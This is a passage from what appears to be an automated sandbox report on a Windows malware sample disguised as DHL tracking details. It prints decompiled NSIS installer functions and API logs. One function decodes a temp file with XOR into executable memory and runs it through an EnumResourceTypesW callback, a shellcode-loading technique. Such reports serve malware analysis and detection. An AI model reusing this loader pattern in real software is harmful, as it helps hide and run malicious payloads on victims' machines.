						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}


















                    0x00402f06
                    0x00402f10
                    0x00402f12
                    0x00402f19
                    0x00402f1d
                    0x00402f28
                    0x00402f28
                    0x00402f30
                    0x00402f32
                    0x00402f39
                    0x00402f55
                    0x00402f59
                    0x00403022
                    0x00403022
                    0x00000000
                    0x00402f68
                    0x00402f6b
                    0x00402f71
                    0x00402f78
                    0x00402f7b
                    0x00402f84
                    0x00402ff1
                    0x00402ff7
                    0x00402ff9
                    0x00402ff9
                    0x0040300b
                    0x0040300f
                    0x00000000
                    0x00403011
                    0x00403011
                    0x00403014
                    0x0040301a
                    0x00000000
                    0x0040301a
                    0x00402f86
                    0x00402f89
                    0x0040301d
                    0x0040301d
                    0x00402f8f
                    0x00402f94
                    0x00402f94
                    0x00402f9c
                    0x00402f9e
                    0x00402f9e
                    0x00402faf
                    0x00402fb3
                    0x00000000
                    0x00000000
                    0x00402fc7
                    0x00402fcf
                    0x00402fed
                    0x00403024
                    0x00403024
                    0x00402fd6
                    0x00402fd6
                    0x00402fd9
                    0x00402fdc
                    0x00402fdf
                    0x00402fe9
                    0x00000000
                    0x00402feb
                    0x00000000
                    0x00402feb
                    0x00402fe9
                    0x00000000
                    0x00402fcf
                    0x00000000
                    0x00402f94
                    0x00402f89
                    0x00402f84
                    0x00402f7b
                    0x00402f59
                    0x00403025
                    0x00403029

                    APIs
                    • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402F28
                    • ReadFile.KERNELBASE(00409128,00000004,00007DE4,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                    • ReadFile.KERNELBASE(00413038,00004000,00007DE4,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402FAF
                    • WriteFile.KERNELBASE(00000000,00413038,00007DE4,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$Read$PointerWrite
                    • String ID: 80A
                    • API String ID: 2113905535-195308239
                    • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                    • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                    • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                    • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 735F1000 Relevance: 9.1, APIs: 6, Instructions: 95filememoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E735F1000(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				short _v6;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				char _v24;
				long _v28;
				short _v1068;
				short _t18;
				short _t19;
				short _t20;
				short _t21;
				short _t22;
				short _t23;
				short _t24;
				short _t25;
				short _t26;
				void* _t34;
				_Unknown_base(*)()* _t36;
				long _t46;
				void* _t53;
				_Unknown_base(*)()* _t57;
				void* _t59;

				_t18 = 0x79;
				_v24 = _t18;
				_t19 = 0x62;
				_v22 = _t19;
				_t20 = 0x6c;
				_v20 = _t20;
				_t21 = 0x68;
				_v18 = _t21;
				_t22 = 0x63;
				_v16 = _t22;
				_t23 = 0x69;
				_v14 = _t23;
				_t24 = 0x75;
				_v12 = _t24;
				_t25 = 0x77;
				_v10 = _t25;
				_t26 = 0x7a;
				_v8 = _t26;
				_v6 = 0;
				GetTempPathW(0x103,  &_v1068);
				E735F473E( &_v1068,  &_v24);
				_t34 = CreateFileW( &_v1068, 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_t59 = _t34;
				_t46 = GetFileSize(_t59, 0);
				_t36 = VirtualAlloc(0, _t46, 0x3000, 0x40); // executed
				_t57 = _t36;
				ReadFile(_t59, _t57, _t46,  &_v28, 0); // executed
				_t53 = 0;
				if(_t46 != 0) {
					do {
						 *(_t53 + _t57) = ( *(_t53 + _t57) ^ 0x00000088) + 0x21;
						_t53 = _t53 + 1;
					} while (_t53 < _t46);
				}
				EnumResourceTypesW(0, _t57, 0); // executed
				return 0x1046a;
			}






























                    0x735f100e
                    0x735f1011
                    0x735f1015
                    0x735f1018
                    0x735f101c
                    0x735f101f
                    0x735f1023
                    0x735f1026
                    0x735f102a
                    0x735f102d
                    0x735f1031
                    0x735f1034
                    0x735f1038
                    0x735f103b
                    0x735f103f
                    0x735f1042
                    0x735f1046
                    0x735f1047
                    0x735f104d
                    0x735f105d
                    0x735f106e
                    0x735f108e
                    0x735f1094
                    0x735f10a5
                    0x735f10a9
                    0x735f10b1
                    0x735f10ba
                    0x735f10c0
                    0x735f10c4
                    0x735f10c6
                    0x735f10cd
                    0x735f10d0
                    0x735f10d1
                    0x735f10c6
                    0x735f10da
                    0x735f10f4

                    APIs
                    • GetTempPathW.KERNEL32(00000103,?), ref: 735F105D
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 735F108E
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 735F1098
                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 735F10A9
                    • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 735F10BA
                    • EnumResourceTypesW.KERNEL32 ref: 735F10DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.362749044.00000000735F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 735F0000, based on PE: true
                    • Associated: 00000000.00000002.362734839.00000000735F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000000.00000002.362766229.00000000735F5000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_735f0000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$AllocCreateEnumPathReadResourceSizeTempTypesVirtual
                    • String ID:
                    • API String ID: 3718768629-0
                    • Opcode ID: c94430efe445602d0bb9514fba7a23814980fa704528323e23870d015669e0c6
                    • Instruction ID: 8ae590dc03af96c38924be4cabdfd078ab64537de51d49bd537996730798e134
                    • Opcode Fuzzy Hash: c94430efe445602d0bb9514fba7a23814980fa704528323e23870d015669e0c6
                    • Instruction Fuzzy Hash: F021CE76A44349BBF7209AE19C55FBF377CEF45B10F20001AF604EB180D9A55A828369
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040302C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 532 40302c-403055 GetTickCount 533 403196-40319e call 402bc5 532->533 534 40305b-403086 call 4031da SetFilePointer 532->534 539 4031a0-4031a5 533->539 540 40308b-40309d 534->540 541 4030a1-4030af call 4031a8 540->541 542 40309f 540->542 545 4030b5-4030c1 541->545 546 403188-40318b 541->546 542->541 547 4030c7-4030cd 545->547 546->539 548 4030f8-403114 call 405e9d 547->548 549 4030cf-4030d5 547->549 555 403191 548->555 556 403116-40311e 548->556 549->548 551 4030d7-4030f7 call 402bc5 549->551 551->548 557 403193-403194 555->557 558 403120-403136 WriteFile 556->558 559 403152-403158 556->559 557->539 560 403138-40313c 558->560 561 40318d-40318f 558->561 559->555 562 40315a-40315c 559->562 560->561 563 40313e-40314a 560->563 561->557 562->555 564 40315e-403171 562->564 563->547 565 403150 563->565 564->540 566 403177-403186 SetFilePointer 564->566 565->564 566->533
                    C-Code - Quality: 94%
                    			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				void* _t39;
				long _t40;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t53;

				_t35 =  *0x41703c; // 0x41a9c
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					L2:
					_t12 =  *0x417040; // 0x3e104
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					while(1) {
						_t46 =  *0x423eb0; // 0x50f930
						if(_t46 != 0) {
							_t47 =  *0x423f40; // 0x0
							if(_t47 == 0) {
								_t22 =  *0x41f048; // 0x4081
								 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
								E00402BC5(0);
							}
						}
						 *0x40afd0 = 0x40b038;
						 *0x40afd4 = 0x8000; // executed
						_t16 = E00405E9D(0x40afb0); // executed
						if(_t16 < 0) {
							break;
						}
						_t39 =  *0x40afd0; // 0x40f0b9
						_t40 = _t39 - 0x40b038;
						if(_t40 == 0) {
							__eflags =  *0x40afcc; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags = _t34;
							if(_t34 == 0) {
								break;
							}
							L17:
							_t18 =  *0x41703c; // 0x41a9c
							if(_t18 -  *0x40afa8 + _a4 > 0) {
								goto L2;
							}
							SetFilePointer( *0x409014, _t18, 0, 0); // executed
							goto L23;
						}
						_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
						if(_t21 == 0 || _t40 != _v4) {
							_push(0xfffffffe);
							L22:
							_pop(_t17);
							return _t17;
						} else {
							 *0x40afa8 =  *0x40afa8 + _t40;
							_t53 =  *0x40afcc; // 0x0
							if(_t53 != 0) {
								continue;
							}
							goto L17;
						}
					}
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}





















                    0x00403030
                    0x0040303d
                    0x00403050
                    0x00403055
                    0x00403196
                    0x00403198
                    0x00000000
                    0x0040319e
                    0x00403061
                    0x00403074
                    0x0040307a
                    0x00403080
                    0x0040308b
                    0x0040308b
                    0x0040308b
                    0x00403090
                    0x00403095
                    0x0040309d
                    0x0040309f
                    0x0040309f
                    0x004030a8
                    0x004030af
                    0x00000000
                    0x00000000
                    0x004030b5
                    0x004030bb
                    0x004030c1
                    0x004030c7
                    0x004030c7
                    0x004030cd
                    0x004030cf
                    0x004030d5
                    0x004030d7
                    0x004030ed
                    0x004030f2
                    0x004030f7
                    0x004030d5
                    0x004030fd
                    0x00403103
                    0x0040310d
                    0x00403114
                    0x00000000
                    0x00000000
                    0x00403116
                    0x0040311c
                    0x0040311e
                    0x00403152
                    0x00403158
                    0x00000000
                    0x00000000
                    0x0040315a
                    0x0040315c
                    0x00000000
                    0x00000000
                    0x0040315e
                    0x0040315e
                    0x00403171
                    0x00000000
                    0x00000000
                    0x00403180
                    0x00000000
                    0x00403180
                    0x0040312e
                    0x00403136
                    0x0040318d
                    0x00403193
                    0x00403193
                    0x00000000
                    0x0040313e
                    0x0040313e
                    0x00403144
                    0x0040314a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00403150
                    0x00403136
                    0x00403191
                    0x00000000
                    0x00403191
                    0x00000000

                    APIs
                    • GetTickCount.KERNEL32 ref: 00403041
                      • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                    • WriteFile.KERNELBASE(0040B038,0040F0B9,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                    • SetFilePointer.KERNELBASE(00041A9C,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$Pointer$CountTickWrite
                    • String ID: 80A
                    • API String ID: 2146148272-195308239
                    • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                    • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                    • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                    • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00401F51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 567 401f51-401f5d 568 401f63-401f79 call 4029e8 * 2 567->568 569 40200b-40200d 567->569 579 401f88-401f96 LoadLibraryExA 568->579 580 401f7b-401f86 GetModuleHandleA 568->580 571 402156-40215b call 401423 569->571 577 40287d-40288c 571->577 582 401f98-401fa6 GetProcAddress 579->582 583 402004-402006 579->583 580->579 580->582 584 401fe5-401fea call 404e23 582->584 585 401fa8-401fae 582->585 583->571 589 401fef-401ff2 584->589 587 401fb0-401fbc call 401423 585->587 588 401fc7-401fde call 735f1000 585->588 587->589 595 401fbe-401fc5 587->595 591 401fe0-401fe3 588->591 589->577 592 401ff8-401fff FreeLibrary 589->592 591->589 592->577 595->589
                    C-Code - Quality: 57%
                    			E00401F51(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t25;
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
					_t29 = _t18;
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t25 = GetModuleHandleA(_t31); // executed
				_t29 = _t25;
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                    0x00401f51
                    0x00401f51
                    0x00401f56
                    0x00401f5d
                    0x0040200b
                    0x00402156
                    0x00402156
                    0x0040287d
                    0x00402880
                    0x0040288c
                    0x0040288c
                    0x00401f6c
                    0x00401f76
                    0x00401f79
                    0x00401f88
                    0x00401f8c
                    0x00401f92
                    0x00401f96
                    0x00402004
                    0x00000000
                    0x00402004
                    0x00401f98
                    0x00401fa2
                    0x00401fa6
                    0x00401fea
                    0x00401fa8
                    0x00401fab
                    0x00401fae
                    0x00401fde
                    0x00401fb0
                    0x00401fb3
                    0x00401fbc
                    0x00401fbe
                    0x00401fbe
                    0x00401fbc
                    0x00401fae
                    0x00401ff2
                    0x00401ff9
                    0x00401ff9
                    0x00000000
                    0x00401ff2
                    0x00401f7c
                    0x00401f82
                    0x00401f86
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                      • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                      • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                      • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                      • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                      • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                    • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                    • String ID: ?B
                    • API String ID: 2987980305-117478770
                    • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                    • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                    • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                    • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 597 4015b3-4015c6 call 4029e8 call 40560c 602 4015c8-4015e3 call 4055a3 CreateDirectoryA 597->602 603 40160a-40160d 597->603 610 401600-401608 602->610 611 4015e5-4015f0 GetLastError 602->611 605 40162d-40215b call 401423 603->605 606 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 603->606 619 40287d-40288c 605->619 606->619 610->602 610->603 614 4015f2-4015fb GetFileAttributesA 611->614 615 4015fd 611->615 614->610 614->615 615->610
                    C-Code - Quality: 85%
                    			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                    0x004015b3
                    0x004015ba
                    0x004015bd
                    0x004015c2
                    0x004015c6
                    0x004015c8
                    0x004015d0
                    0x004015d6
                    0x004015d8
                    0x004015db
                    0x004015e3
                    0x004015f0
                    0x004015fd
                    0x004015fd
                    0x004015f2
                    0x004015f3
                    0x004015fb
                    0x00000000
                    0x00000000
                    0x004015fb
                    0x004015f0
                    0x00401600
                    0x00401603
                    0x00401605
                    0x00401606
                    0x004015c8
                    0x0040160d
                    0x0040162d
                    0x00402156
                    0x0040160f
                    0x00401611
                    0x0040161c
                    0x00401622
                    0x00401622
                    0x00402880
                    0x0040288c

                    APIs
                      • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,747DF560,004053BE,?,"C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" ,747DF560), ref: 0040561A
                      • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                      • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                    • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                    • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                    • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                    Strings
                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                    • String ID: C:\Users\user\AppData\Local\Temp
                    • API String ID: 3751793516-1104044542
                    • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                    • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                    • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                    • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040578B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 622 40578b-405795 623 405796-4057c0 GetTickCount GetTempFileNameA 622->623 624 4057c2-4057c4 623->624 625 4057cf-4057d1 623->625 624->623 626 4057c6 624->626 627 4057c9-4057cc 625->627 626->627
                    C-Code - Quality: 100%
                    			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                    0x0040578f
                    0x00405795
                    0x00405796
                    0x00405796
                    0x00405797
                    0x0040579e
                    0x004057a8
                    0x004057b5
                    0x004057b8
                    0x004057c0
                    0x00000000
                    0x00000000
                    0x004057c4
                    0x00000000
                    0x00000000
                    0x004057c6
                    0x00000000
                    0x004057c6
                    0x00000000

                    APIs
                    • GetTickCount.KERNEL32 ref: 0040579E
                    • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
